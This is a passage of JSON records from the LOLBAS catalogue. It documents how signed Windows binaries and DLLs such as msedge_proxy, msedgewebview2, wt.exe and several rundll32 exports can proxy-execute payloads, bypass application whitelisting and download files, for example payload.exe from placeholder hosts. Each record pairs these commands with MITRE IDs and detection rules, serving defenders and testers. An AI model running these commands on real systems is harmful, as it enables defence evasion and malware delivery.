11","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\xwizard.exe"},{"Path":"C:\\Windows\\SysWOW64\\xwizard.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"}],"Resources":[{"Link":"http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/"},{"Link":"https://www.youtube.com/watch?v=LwDHX7DVHWU"},{"Link":"https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5"},{"Link":"https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/"},{"Link":"https://twitter.com/notwhickey/status/1306023056847110144"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"},{"Name":"msedge_proxy.exe","Description":"Microsoft Edge Browser","Author":"Mert DaÅŸ","Created":"2023-08-18","Commands":[{"Command":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe http://example.com/test.zip","Description":"msedge_proxy will download malicious file.","Usecase":"Download file from the internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11"},{"Command":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\\\\Desktop\\\\test.json &&\"","Description":"Edge will silently download the file.","Usecase":"Download file from the internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11"},{"Command":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c ping google.com &&\"","Description":"msedge_proxy.exe will execute file in the background","Usecase":"Executes a process under a trusted Microsoft signed binary","Category":"Execute","Privileges":"User","MitreID":"T1218.015","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge_proxy.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/"},{"Name":"msedgewebview2.exe","Description":"msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.","Author":"Matan Bahar","Created":"2023-06-15","Commands":[{"Command":"msedgewebview2.exe --no-sandbox --browser-subprocess-path=\"C:\\Windows\\System32\\calc.exe\"","Description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.","Usecase":"Proxy execution of binary","Category":"Execute","Privileges":"Low privileges","MitreID":"T1218.015","OperatingSystem":"Windows 10, Windows 11"},{"Command":"msedgewebview2.exe --utility-cmd-prefix=\"calc.exe\"","Description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.","Usecase":"Proxy execution of binary","Category":"Execute","Privileges":"User","MitreID":"T1218.015","OperatingSystem":"Windows 10, Windows 11"},{"Command":"msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher=\"calc.exe\"","Description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.","Usecase":"Proxy execution of binary","Category":"Execute","Privileges":"User","MitreID":"T1218.015","OperatingSystem":"Windows 10, Windows 11"},{"Command":"msedgewebview2.exe --no-sandbox --renderer-cmd-prefix=\"calc.exe\"","Description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.","Usecase":"Proxy execution of binary","Category":"Execute","Privileges":"User","MitreID":"T1218.015","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"IOC":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"Resources":[{"Link":"https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"},{"Name":"wt.exe","Description":"Windows Terminal","Author":"Nasreddine Bencherchali","Created":"2022-07-27","Commands":[{"Command":"wt.exe calc.exe","Description":"Execute calc.exe via Windows Terminal.","Usecase":"Use wt.exe as a proxy binary to evade defensive counter-measures","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_<version_packageid>\\wt.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml"}],"Resources":[{"Link":"https://twitter.com/nas_bench/status/1552100271668469761"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/wt/"},{"Name":"Advpack.dll","Description":"Utility for installing software and drivers with rundll32.exe","Author":"LOLBAS Team","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,","Description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","Usecase":"Run local or remote script(let) code through INF file specification.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,,1,","Description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).","Usecase":"Run local or remote script(let) code through INF file specification.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Input":"INF"}]},{"Command":"rundll32.exe advpack.dll,RegisterOCX test.dll","Description":"Launch a DLL payload by calling the RegisterOCX function.","Usecase":"Load a DLL payload.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"rundll32.exe advpack.dll,RegisterOCX calc.exe","Description":"Launch an executable by calling the RegisterOCX function.","Usecase":"Run an executable payload.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32 advpack.dll, RegisterOCX \"cmd.exe /c calc.exe\"","Description":"Launch command line by calling the RegisterOCX function.","Usecase":"Run an executable payload.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\advpack.dll"},{"Path":"c:\\windows\\syswow64\\advpack.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"Resources":[{"Link":"https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/"},{"Link":"https://twitter.com/ItsReallyNick/status/967859147977850880"},{"Link":"https://twitter.com/bohops/status/974497123101179904"},{"Link":"https://twitter.com/moriarty_meng/status/977848311603380224"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Advpack/"},{"Name":"Desk.cpl","Description":"Desktop Settings Control Panel","Author":"Hai Vaknin","Created":"2022-04-21","Commands":[{"Command":"rundll32.exe desk.cpl,InstallScreenSaver C:\\temp\\file.scr","Description":"Launch an executable with a .scr extension by calling the InstallScreenSaver function.","Usecase":"Launch any executable payload, as long as it uses the .scr extension.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32.exe desk.cpl,InstallScreenSaver \\\\127.0.0.1\\c$\\temp\\file.scr","Description":"Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.","Usecase":"Launch any executable payload, as long as it uses the .scr extension.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\desk.cpl"},{"Path":"C:\\Windows\\SysWOW64\\desk.cpl"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml"}],"Resources":[{"Link":"https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt"},{"Link":"https://twitter.com/pabraeken/status/998627081360695297"},{"Link":"https://twitter.com/VakninHai/status/1517027824984547329"},{"Link":"https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Desk/"},{"Name":"Dfshim.dll","Description":"ClickOnce engine in Windows used by .NET","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo","Description":"Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)","Usecase":"Use binary to bypass Application whitelisting","Category":"AWL Bypass","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"Resources":[{"Link":"https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf"},{"Link":"https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Dfshim/"},{"Name":"Ieadvpack.dll","Description":"INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.","Author":"LOLBAS Team","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe ieadvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,","Description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","Usecase":"Run local or remote script(let) code through INF file specification.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32.exe ieadvpack.dll,LaunchINFSection c:\\test.inf,,1,","Description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).","Usecase":"Run local or remote script(let) code through INF file specification.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32.exe ieadvpack.dll,RegisterOCX test.dll","Description":"Launch a DLL payload by calling the RegisterOCX function.","Usecase":"Load a DLL payload.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"rundll32.exe ieadvpack.dll,RegisterOCX calc.exe","Description":"Launch an executable by calling the RegisterOCX function.","Usecase":"Run an executable payload.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32 ieadvpack.dll, RegisterOCX \"cmd.exe /c calc.exe\"","Description":"Launch command line by calling the RegisterOCX function.","Usecase":"Run an executable payload.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\ieadvpack.dll"},{"Path":"c:\\windows\\syswow64\\ieadvpack.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml"}],"Resources":[{"Link":"https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/"},{"Link":"https://twitter.com/pabraeken/status/991695411902599168"},{"Link":"https://twitter.com/0rbz_/status/974472392012689408"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"},{"Name":"Ieframe.dll","Description":"Internet Browser DLL for translating HTML code.","Author":"LOLBAS Team","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe ieframe.dll,OpenURL \"C:\\test\\calc.url\"","Description":"Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.","Usecase":"Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\ieframe.dll"},{"Path":"c:\\windows\\syswow64\\ieframe.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"Resources":[{"Link":"http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/"},{"Link":"https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/"},{"Link":"https://twitter.com/bohops/status/997690405092290561"},{"Link":"https://windows10dll.nirsoft.net/ieframe_dll.html"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Ieframe/"},{"Name":"Mshtml.dll","Description":"Microsoft HTML Viewer","Author":"LOLBAS Team","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe Mshtml.dll,PrintHTML \"C:\\temp\\calc.hta\"","Description":"Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box).","Usecase":"Launch an HTA application.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\mshtml.dll"},{"Path":"c:\\windows\\syswow64\\mshtml.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"Resources":[{"Link":"https://twitter.com/pabraeken/status/998567549670477824"},{"Link":"https://windows10dll.nirsoft.net/mshtml_dll.html"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Mshtml/"},{"Name":"Pcwutl.dll","Description":"Microsoft HTML Viewer","Author":"LOLBAS Team","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe pcwutl.dll,LaunchApplication calc.exe","Description":"Launch executable by calling the LaunchApplication function.","Usecase":"Launch an executable.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\pcwutl.dll"},{"Path":"c:\\windows\\syswow64\\pcwutl.dll"}],"Detection":[{"Analysis":"https://redcanary.com/threat-detection-report/techniques/rundll32/"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"Resources":[{"Link":"https://twitter.com/harr0ey/status/989617817849876488"},{"Link":"https://windows10dll.nirsoft.net/pcwutl_dll.html"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/"},{"Name":"Scrobj.dll","Description":"Windows Script Component Runtime","Author":"Eral4m","Created":"2021-01-07","Commands":[{"Command":"rundll32.exe C:\\Windows\\System32\\scrobj.dll,GenerateTypeLib http://x.x.x.x/payload.exe","Description":"Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\<random>\\payload[1].exe.","Usecase":"Download file from remote location.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"c:\\windows\\system32\\scrobj.dll"},{"Path":"c:\\windows\\syswow64\\scrobj.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"IOC":"Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line"}],"Resources":[{"Link":"https://twitter.com/eral4m/status/1479106975967240209"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Scrobj/"},{"Name":"Setupapi.dll","Description":"Windows Setup Application Programming Interface","Author":"LOLBAS Team","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf","Description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","Usecase":"Run local or remote script(let) code through INF file specification.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Input":"INF"}]},{"Command":"rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf","Description":"Launch an executable file via the InstallHinfSection function and .inf file section directive.","Usecase":"Load an executable payload.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows","Tags":[{"Input":"INF"}]}],"Full_Path":[{"Path":"c:\\windows\\system32\\setupapi.dll"},{"Path":"c:\\windows\\syswow64\\setupapi.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml"}],"Resources":[{"Link":"https://github.com/huntresslabs/evading-autoruns"},{"Link":"https://twitter.com/pabraeken/status/994742106852941825"},{"Link":"https://windows10dll.nirsoft.net/setupapi_dll.html"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Setupapi/"},{"Name":"Shdocvw.dll","Description":"Shell Doc Object and Control Library.","Author":"LOLBAS Team","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe shdocvw.dll,OpenURL \"C:\\test\\calc.url\"","Description":"Launch an executable payload via proxy through a URL (information) file by calling OpenURL.","Usecase":"Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\shdocvw.dll"},{"Path":"c:\\windows\\syswow64\\shdocvw.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"Resources":[{"Link":"http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/"},{"Link":"https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/"},{"Link":"https://twitter.com/bohops/status/997690405092290561"},{"Link":"https://windows10dll.nirsoft.net/shdocvw_dll.html"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/"},{"Name":"Shell32.dll","Description":"Windows Shell Common Dll","Author":"LOLBAS Team","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe shell32.dll,Control_RunDLL c:\\path\\to\\payload.dll","Description":"Launch a DLL payload by calling the Control_RunDLL function.","Usecase":"Load a DLL payload.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe","Description":"Launch an executable by calling the ShellExec_RunDLL function.","Usecase":"Run an executable payload.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32 SHELL32.DLL,ShellExec_RunDLL \"cmd.exe\" \"/c echo hi\"","Description":"Launch command line by calling the ShellExec_RunDLL function.","Usecase":"Run an executable payload.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\shell32.dll"},{"Path":"c:\\windows\\syswow64\\shell32.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"Resources":[{"Link":"https://twitter.com/Hexacorn/status/885258886428725250"},{"Link":"https://twitter.com/pabraeken/status/991768766898941953"},{"Link":"https://twitter.com/mattifestation/status/776574940128485376"},{"Link":"https://twitter.com/KyleHanslovan/status/905189665120149506"},{"Link":"https://windows10dll.nirsoft.net/shell32_dll.html"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Shell32/"},{"Name":"Shimgvw.dll","Description":"Photo Gallery Viewer","Author":"Eral4m","Created":"2021-01-06","Commands":[{"Command":"rundll32.exe c:\\Windows\\System32\\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe","Description":"Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.","Usecase":"Download file from remote location.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"c:\\windows\\system32\\shimgvw.dll"},{"Path":"c:\\windows\\syswow64\\shimgvw.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"IOC":"Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line"}],"Resources":[{"Link":"https://twitter.com/eral4m/status/1479080793003671557"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Shimgvw/"},{"Name":"Syssetup.dll","Description":"Windows NT System Setup","Author":"LOLBAS Team","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf","Description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","Usecase":"Run local or remote script(let) code through INF file specification (Note May pop an error window).","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Input":"INF"}]},{"Command":"rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\temp\\something.inf","Description":"Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.","Usecase":"Load an executable payload.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Input":"INF"}]}],"Full_Path":[{"Path":"c:\\windows\\system32\\syssetup.dll"},{"Path":"c:\\windows\\syswow64\\syssetup.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml"}],"Resources":[{"Link":"https://twitter.com/pabraeken/status/994392481927258113"},{"Link":"https://twitter.com/harr0ey/status/975350238184697857"},{"Link":"https://twitter.com/bohops/status/975549525938135040"},{"Link":"https://windows10dll.nirsoft.net/syssetup_dll.html"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Syssetup/"},{"Name":"Url.dll","Description":"Internet Shortcut Shell Extension DLL.","Author":"LOLBAS Team","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe url.dll,OpenURL \"C:\\test\\calc.hta\"","Description":"Launch a HTML application payload by calling OpenURL.","Usecase":"Invoke an HTML Application via mshta.exe (Default Handler).","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32.exe url.dll,OpenURL \"C:\\test\\calc.url\"","Description":"Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.","Usecase":"Load an executable payload by calling a .url file with or without quotes.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","Description":"Launch an executable by calling OpenURL.","Usecase":"Load an executable payload by specifying the file protocol handler (obfuscated).","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32.exe url.dll,FileProtocolHandler calc.exe","Description":"Launch an executable by calling FileProtocolHandler.","Usecase":"Launch an executable.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","Description":"Launch an executable by calling FileProtocolHandler.","Usecase":"Load an executable payload by specifying the file protocol handler (obfuscated).","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta","Description":"Launch a HTML application payload by calling FileProtocolHandler.","Usecase":"Invoke an HTML Application via mshta.exe (Default Handler).","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\url.dll"},{"Path":"c:\\windows\\syswow64\\url.dll"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"Resources":[{"Link":"https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/"},{"Link":"https://twitter.com/DissectMalware/status/995348436353470465"},{"Link":"https://twitter.com/bohops/status/974043815655956481"},{"Link":"https://twitter.com/yeyint_mth/status/997355558070927360"},{"Link":"https://twitter.com/Hexacorn/status/974063407321223168"},{"Link":"https://windows10dll.nirsoft.net/url_dll.html"}],"url":"https://lolbas-project.github.io/lolbas/Libraries/Url/"},{"Name":"Zipfldr.dll","Description":"Compressed Folder library","Author":"LOLBAS Team","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe zipfldr.dll,RouteTheCall calc.exe","Description":"Launch an executable payload by calling RouteTheCall.","Usecase":"Launch an executable.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10, Windows 11"},{"Command":"rundll32.exe zipfldr.dll,RouteTheCall 